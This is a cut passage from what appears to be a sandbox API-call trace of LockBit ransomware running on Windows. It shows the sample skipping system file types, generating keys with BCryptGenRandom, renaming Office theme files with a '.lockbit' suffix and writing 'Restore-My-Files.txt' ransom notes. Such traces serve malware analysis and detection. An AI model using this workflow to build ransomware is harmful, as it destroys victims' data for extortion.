nFileSizeHigh=0x0, nFileSizeLow=0xd748, dwReserved0=0x0, dwReserved1=0x0, cFileName="Executive.thmx", cAlternateFileName="EXECUT~1.THM")) returned 1 [0187.543] lstrcmpiW (lpString1=".", lpString2="Executive.thmx") returned -1 [0187.543] lstrcmpiW (lpString1="..", lpString2="Executive.thmx") returned -1 [0187.543] PathFindExtensionW (pszPath="Executive.thmx") returned=".thmx" [0187.543] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.543] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.544] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.544] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Executive.thmx") returned 1 [0187.545] lstrcmpiW (lpString1="ntldr", lpString2="Executive.thmx") returned 1 [0187.545] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Executive.thmx") returned 1 [0187.545] lstrcmpiW (lpString1="bootsect.bak", lpString2="Executive.thmx") returned -1 [0187.545] lstrcmpiW (lpString1="autorun.inf", lpString2="Executive.thmx") returned -1 [0187.545] lstrcmpiW (lpString1="thumbs.db", lpString2="Executive.thmx") returned 1 [0187.545] lstrcmpiW (lpString1="iconcache.db", lpString2="Executive.thmx") returned 1 [0187.545] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.545] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx") returned=".thmx" [0187.545] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.545] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.545] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.546] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.546] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx.lockbit") returned 76 [0187.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\executive.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0187.550] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.550] malloc (_Size=0x40068) returned 0x3e70008 [0187.550] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=55112) returned 1 [0187.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0187.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0187.551] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0187.553] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.553] malloc (_Size=0xae) returned 0x1fa2ed8 [0187.553] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0187.555] free (_Block=0x1fa2ed8) [0187.555] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Executive.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.555] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.555] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.555] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e9de00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ae6080, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x11e9de00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x100a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flow.thmx", cAlternateFileName="FLOW~1.THM")) returned 1 [0187.555] lstrcmpiW (lpString1=".", lpString2="Flow.thmx") returned -1 [0187.555] lstrcmpiW (lpString1="..", lpString2="Flow.thmx") returned -1 [0187.555] PathFindExtensionW (pszPath="Flow.thmx") returned=".thmx" [0187.555] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.555] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.556] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.556] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Flow.thmx") returned 1 [0187.557] lstrcmpiW (lpString1="ntldr", lpString2="Flow.thmx") returned 1 [0187.557] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Flow.thmx") returned 1 [0187.557] lstrcmpiW (lpString1="bootsect.bak", lpString2="Flow.thmx") returned -1 [0187.557] lstrcmpiW (lpString1="autorun.inf", lpString2="Flow.thmx") returned -1 [0187.557] lstrcmpiW (lpString1="thumbs.db", lpString2="Flow.thmx") returned 1 [0187.557] lstrcmpiW (lpString1="iconcache.db", lpString2="Flow.thmx") returned 1 [0187.557] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.557] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx") returned=".thmx" [0187.557] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.557] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.557] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.558] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.558] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.558] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.558] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.558] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.558] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.558] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.558] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx.lockbit") returned 71 [0187.558] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\flow.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0187.561] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.561] malloc (_Size=0x40068) returned 0x3d70450 [0187.561] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=65704) returned 1 [0187.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0187.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0187.562] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0187.565] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.565] malloc (_Size=0xa4) returned 0x1fa2ed8 [0187.565] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0187.566] free (_Block=0x1fa2ed8) [0187.566] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Flow.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.566] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.566] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.566] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe565700, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b0c1e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe565700, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xf814, dwReserved0=0x0, dwReserved1=0x0, cFileName="Foundry.thmx", cAlternateFileName="FOUNDR~1.THM")) returned 1 [0187.566] lstrcmpiW (lpString1=".", lpString2="Foundry.thmx") returned -1 [0187.566] lstrcmpiW (lpString1="..", lpString2="Foundry.thmx") returned -1 [0187.566] PathFindExtensionW (pszPath="Foundry.thmx") returned=".thmx" [0187.566] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.566] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.566] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.567] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.567] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Foundry.thmx") returned 1 [0187.568] lstrcmpiW (lpString1="ntldr", lpString2="Foundry.thmx") returned 1 [0187.568] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Foundry.thmx") returned 1 [0187.568] lstrcmpiW (lpString1="bootsect.bak", lpString2="Foundry.thmx") returned -1 [0187.568] lstrcmpiW (lpString1="autorun.inf", lpString2="Foundry.thmx") returned -1 [0187.568] lstrcmpiW (lpString1="thumbs.db", lpString2="Foundry.thmx") returned 1 [0187.568] lstrcmpiW (lpString1="iconcache.db", lpString2="Foundry.thmx") returned 1 [0187.568] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.568] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Foundry.thmx") returned=".thmx" [0187.568] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.568] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.568] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.569] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.569] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 